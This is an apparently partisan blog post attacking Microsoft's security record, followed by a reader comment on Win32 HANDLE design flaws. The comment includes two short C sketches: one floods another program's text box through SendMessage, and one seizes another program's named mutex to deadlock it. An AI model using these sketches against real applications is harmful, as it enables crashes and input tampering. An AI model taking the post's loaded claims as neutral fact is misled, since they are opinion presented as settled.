THE MONOPOLIST (poor Microsoft) loves blaming security problems on its illegally-earned market share on the desktop, but as we explained yesterday, this is a nonsensical argument and it is negligence [1, 2, 3] -- not installed base -- which makes software vulnerable. Vista 7 is not secure and even Microsoft's fanbase is willing to admit this. In Windows, the "latest hole will soon be patched after a decade of vulnerability," says a blogger, and it is not the first such example of belated patching. If Microsoft's installed base is the reason exploitable errors can be found, why has it taken a decade? The fact of the matter is that less auditing of code lowers its quality. Developers can get away with terrible programming practices, and security is assumed to come from secrecy rather than from peer review, which requires full transparency. This explains not only why Microsoft software is insecure but also why it is of such low quality (which makes the coders embarrassed to show it). As mentioned briefly in the daily links, Microsoft Fog Computing turns out to be as unreliable as its desktop-side software:
Customers on BPOS in the US and worldwide were kicked off their hosted Exchange email systems, being unable to read, write, or access their messages. All users were affected – from down in the cubicle farm all the way up to the CEO's corner office. The outages started Tuesday and came after weeks of the service slowly degrading.
Comments
Needs Sunlight
2011-05-16 07:51:36
TemporalBeing
2011-05-19 17:15:38
1. They don't have a very good patch management system, likely due to their source code management practices. The big problem is that one patch fixes an issue and another un-fixes it; this then goes round and round for years.
2. Win32 by design is insecure and cannot be fixed. The basic interface for applications to the Windows API is a system that utilizes an object called a HANDLE. Applications are supposed to use the HANDLE to do something, and then clean it up when they're done. However, there is no protection against one application getting a HANDLE for an object belonging to another application. Furthermore, a HANDLE is merely a _pointer_ into one of several different tables (which one depends on the use of the HANDLE) inside kernel space, and there is no method to authenticate the validity of a HANDLE - at least from the application layer.
What this means is that Win32 by design allows other applications to put bugs into your application. Here's one very valid example:
Your application creates a text box that is supposed to be only 256 characters long. You specify this when you create the text box, and you properly use the text box to get the 256 characters.
However, your friend BillB writes another application that accesses your text box, changes it to be 64536 bytes long, and inserts enough extra text to use up the entire space. Windows updates your text box to the size BillB's application requested, but it is YOUR text box, not BillB's. Your application is now subject to a buffer overflow attack through no fault of your own. (Your application used the text box properly.)
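A minimal sketch of what BillB's side of this could look like, assuming the victim's window is titled "Your App" and its first Edit control is the 256-character text box (both names are invented for the illustration); the point is only that FindWindow and SendMessage hand any process a handle to somebody else's control:

    /* sketch.c - hedged illustration of the text box scenario above.
     * "Your App" (window title) and the first "Edit" child control are
     * assumptions made up for this example, not details from the post. */
    #include <windows.h>
    #include <string.h>

    int main(void)
    {
        /* Any process may ask for another application's window handle;
         * nothing ties the returned HWND to the process that created it. */
        HWND top  = FindWindowA(NULL, "Your App");
        HWND edit = FindWindowExA(top, NULL, "Edit", NULL);
        if (edit == NULL)
            return 1;

        /* Raise the owner's 256-character limit from the outside... */
        SendMessageA(edit, EM_LIMITTEXT, 64536, 0);

        /* ...then stuff the control with far more text than its owner
         * was written to expect. */
        static char payload[64536];
        memset(payload, 'A', sizeof(payload) - 1);
        payload[sizeof(payload) - 1] = '\0';
        SendMessageA(edit, WM_SETTEXT, 0, (LPARAM)payload);
        return 0;
    }

(On recent Windows versions, integrity levels can block some messages sent between processes of different privilege, but between ordinary applications at the same level calls like these go through.)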
That is just one attack vector - and it applies to any use of a HANDLE to do something, whether it is a text box or a lock; yes, locks use HANDLEs - so BillB's application could access one of your locks and cause your application to go into a deadlock situation, or worse, unlock something at the wrong time. There are simply no protections and no way of defending against those kinds of attacks - it's the design of the Win32 API.
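The lock case can be sketched the same way, assuming the victim guards something with a named mutex (the name "YourAppLock" below is invented for the example): any process that opens the same name gets an equally valid HANDLE, and holding it forever leaves the owner's threads waiting.

    /* deadlock.c - hedged sketch of the lock scenario; the mutex name
     * "YourAppLock" is an assumption, not something from the post. */
    #include <windows.h>

    int main(void)
    {
        /* Opening a named kernel object only requires knowing the name;
         * the HANDLE handed back is as usable as the one the owner holds. */
        HANDLE lock = OpenMutexA(SYNCHRONIZE, FALSE, "YourAppLock");
        if (lock == NULL)
            return 1;

        /* Acquire the victim's lock and never release it; every thread
         * in the owning application that waits on it now blocks forever. */
        WaitForSingleObject(lock, INFINITE);
        Sleep(INFINITE);
        return 0;
    }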